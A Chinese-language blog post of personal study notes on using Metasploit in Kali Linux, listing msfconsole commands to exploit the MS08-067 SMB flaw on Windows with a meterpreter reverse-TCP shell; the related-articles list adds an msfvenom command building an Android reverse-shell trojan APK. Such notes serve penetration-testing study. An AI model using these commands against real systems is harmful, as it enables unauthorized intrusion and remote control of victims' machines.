kali的学习笔记篇(三)Metasploit初试炼

最新推荐文章于 2024-08-14 16:56:14 发布
最新推荐文章于 2024-08-14 16:56:14 发布
阅读量507 收藏 2
点赞数
分类专栏: kali 卡莉咖喱
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34886247/article/details/81582558
版权
这篇博客介绍了Kali Linux中使用Metasploit框架进行漏洞利用的基本过程。通过`msfconsole`进入控制台,利用`help`和`show`命令查看和选择攻击载荷。攻击步骤包括选择漏洞、设定目标、加载攻击载荷、反弹shell以及执行攻击。
摘要由CSDN通过智能技术生成

exploit:利用漏洞

payload:攻击载荷

#进入msf控制台

msfconsole

help查看帮助信息

show 显示攻击载荷

开始攻击

#装载攻击载荷选择windows系统模块/ms08_067漏洞
use exploit/windows/smb/ms08_067_netapi
#查看选项
show options
#选择目标
set RHOST targetIP
#查看选项
...
#装载攻击载荷并添加一个tcp反向链接
set PAYLOAD windows/meterpreter/reverse_tcp
show options
..
#LHOST 本机IP
#反弹会话到本机
set LHOST myIP
#执行
exploit

#退出攻击模式
back

步骤分析:

1:选择利用漏洞,

2:确定目标

3:装载攻击载荷

4:反弹目标

5:执行

 

红衣学姐
关注
专栏目录
订阅专栏
kali学习笔记(六)metasploit之安卓后门
Kind&红衣的博客
08-12 3521
环境: kali-linux-2018.-2-amd-64.iso android 支持外网监听 0x01: //生成安卓木马: msfvenom -p android/meterpreter/reverse_tcp LHOST=[myIP] LPORT=55555 R > [akpNAME].apk 0x02: //加载攻击模块 use exploit/m...
从零开始学习kali-metasploit 7月23日
qq_42184699的博客
07-23 310
                                                      kali                                                                                                                                           ...
Kali linux渗透测试系列———1、Kali linux渗透测试环境搭建之Kali Linux环境搭建
Fly_鹏程万里
05-07 4125
前言工欲善其事必先利其器,在我们做渗透测试的时候也需要一个强有力的后盾的支持,Kali Linux是一个非常不错的选择,里面集合了较多的渗透测试工具,而且还对不同的工具进行了详细的分类,这对每一个渗透测试人员来说都是非常棒的“黑客系统”,下面我们就简单的介绍一下Kali linux渗透测试环境的搭建,准备工作(1)VMware Workstations 14(2)Kali Linux 2018的镜...
Metasploit漏洞利用系列(一):MSF完美升级及目录结构深度解读
最新发布
2402_86373248的博客
08-14 901
在信息安全领域,MetasploitFramework(MSF)是一个无处不在的工具,它集合了大量的渗透测试和漏洞利用模块,帮助安全专家识别和利用系统中的弱点。本文将深入探讨如何对Metasploit进行完美升级,以及对其核心目录结构进行详尽解读,为初学者和进阶使用者提供全面指南。
metasploit渗透测试魔鬼训练营》学习笔记第七章--社会工程学
Donald Liang 的专栏
04-06 1503
五.社工工程学     5.1社会工程系框架          5.1.1信息搜集                 maltego是一个高度自动化的信息搜集工具,集成在BT5中,如果国内网络环境使用时无法获取结果,可能是无法与信息提供网站建立连接,可以使用VPN或代理服务器。          5.1.2诱导                 1.提高诱导能力  
Kali Linux 学习日记4 -Metasploit(MSF)和 Nessus
qq_46081990的博客
03-06 1343
为了利用一个vulnerability(系统存在的漏洞),通常需要一个exploit(利用漏洞的代码)。exploit可以利用vulnerability,提供目标主机的权限。exploit通常会向目标发送payload(攻击成功后向目标传递的恶意代码),以此来获取目标主机的权限。payload通常由exploit来传递到目标系统上。Metasploit是一个漏洞框架。全称为The Metasploit Framework,简称MSF。它允许使用者开发自己的漏洞脚本(ruby语言),然后进行测试。
如何使用Metasploit进行漏洞利用?
沐尘而生的博客
08-21 499
Metasploit是一款开源的渗透测试框架,它提供了一系列的工具和资源,用于发现、验证和利用系统的漏洞。它不仅具备强大的漏洞利用功能,还能帮助安全专业人员评估网络和应用的安全性。
关于Metasploit学习笔记(二)
Mi1k7ea
03-16 1350
这里接着上一遍Metasploit的文章继续~ WMAP Web扫描: 使用WMAP进行Web站点漏洞扫描,其对象是本机所管理的网站。因而在Kali中需要先开启Apache服务。 启动wmap: load wmap 输入help参看模块信息: 接着设置扫描的Web站点,输入wmap_sites -h来查看相应的参数: 按照参数的提示输入命令: w
关于Metasploit学习笔记(一)
Mi1k7ea
03-08 1176
在百度上关于其的简介:Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布
kali学习笔记1.pdf
07-19
笔记记录了详细的从网络扫描,信息收集(被动信息收集技术讲解,主动信息收集(各层协议的主动扫描方法{从网络层到应用层},nmap扫描器的使用全参数讲解),系统漏洞扫描器缓...笔记还有第二章,可以直接搜索kali学习笔记2
【MSF】Kali最强渗透工具之Metasploit
zou09241314的博客
10-23 1124
类似于msf有一个神奇的魔法,能让复杂的漏洞攻击的流程变得非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击。 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。
2024年最新【MSF】Kali最强渗透工具之Metasploit_kali metasploit(2),网络安全面试选择题
2401_84267735的博客
05-06 619
此处遇到了一个小小问题:出现kali机和windows机连在同一网段,windows机能ping通kali机,而kali机无法ping通Windows的情况,最后通过关闭windows防火墙解决了问题。学到这报一丝,还是没能成功,渗透攻击有可能成功也有可能失败,漏洞在不断修复之中,对于我这个刚开始学渗透的小白来说真是路漫漫其修远兮啊~此处安装的是windows7 64x虚拟机,使之与kali虚拟机在同一网段中,即两台虚拟机能够互相ping通。程,涵盖了95%以上网络安全知识点,真正体系化!
Metasploit Framework-安全漏洞检测工具使用
mogexiuluo的博客
04-27 5213
一款开源的安全漏洞检测工具,简称MSF。可以收集信息、探测系统漏洞、执行漏洞利用测试等,为渗透测试、攻击编码和漏洞研究提供了一个可靠平台。集成数千个漏洞利用、辅助测试模块,并保持持续更新。由著名黑客、安全专家H.D. Moore主导开发排行榜排名第二位官方网站:。在kali中,通过msfconsole进入控制台。
【漏洞检测】metasploit 使用教程
xnxqwzy的博客
01-04 1695
Metasploitv4之后的新版本中,Meterpreter作为后渗透攻击模块的实施通道,可以根据渗透测试目标需求进行灵活扩展。涉及范围: 信息搜集、口令攫取、权限提升、内网拓展等。攻击载荷(msfpayload)是我们期望目标系统在被渗透攻击后去执行的代码,在metasploit框架中可以自由的选择、传送和植入。....Msf编码器是一个非常实用的工具,它能够改变可执行文件中的代码形状,让杀毒软件认不出它原来的样子,而程序的功能不会受到任何影响。
Metasploitable2 靶机详细漏洞介绍及通关
vilice的博客
09-06 4262
漏洞产生的原因:在2009年11月到2010年6月间分布于某些镜面站点的UnreallRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码。漏洞产生原因:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“: )”结尾时,服务器就会在6200端口监听,并且能够执行任意代码。漏洞产生的原因:通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。
安全测试工具Metasploit与漏洞扫描(上)
热门推荐
Maggie97的博客
12-03 1万+
一、漏洞及漏洞发掘方法   漏洞,是指在硬件、软件、协议实现或系统安全策略上存在缺陷,攻击者能够在未授权的情况下对系统进行访问或破坏。它会成为入侵者侵入系统和植入恶意软件的入口,影响系统用户的切身利益。漏洞与目标系统的操作系统版本、软件版本以及服务设置密切相关。研究漏洞必须要了解当前计算机系统及其安全问题的最新发展动态。常见的漏洞包括缓冲区溢出漏洞、跨站脚本漏洞(XSS)、SQL注入漏洞、数据库漏洞以及WEB应用漏洞等。   常见的漏洞发掘方法分为以下几种。   ·黑盒攻击(Fuzzing):即通过注入..
Metasploitable2靶机之第四--Samba MS-RPC Shell 命令注入漏洞(CVE-2007-2447)
千寻的博客
04-02 1784
Samba MS-RPC Shell 命令注入漏洞(CVE-2007-2447)描述 Samba是Samba团队开发的一套可使UNIX系列的操作系统与微软Windows操作系统的SMB/CIFS网络协议做连结的自由软件。 该软件支持共享打印机、互相传输资料文件等。 Samba在处理用户数据时存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。 Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh。 如果在调用smb.conf中定义的外部脚本时,通过对/b
kali下小脚本利用msf做payload生成管理
我的学习笔记
02-28 947
参考:https://www.youtube.com/watch?v=qIikuHTq17ghttps://github.com/rand0m1ze/ezsploit(一个便捷脚本,调用了msf)cd /tmp git clone https://github.com/rand0m1ze/ezsploit.git cd ezsploit bash ezs...
KALI Linux学习笔记:命令操作与系统管理
"这学习记录笔记主要介绍了KALI Linux的基础操作,包括系统更新、软件安装、文件处理、网络配置以及权限管理和用户管理等核心概念。" KALI Linux是一款基于Debian的开源操作系统,专为网络安全专业人士设计,用于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值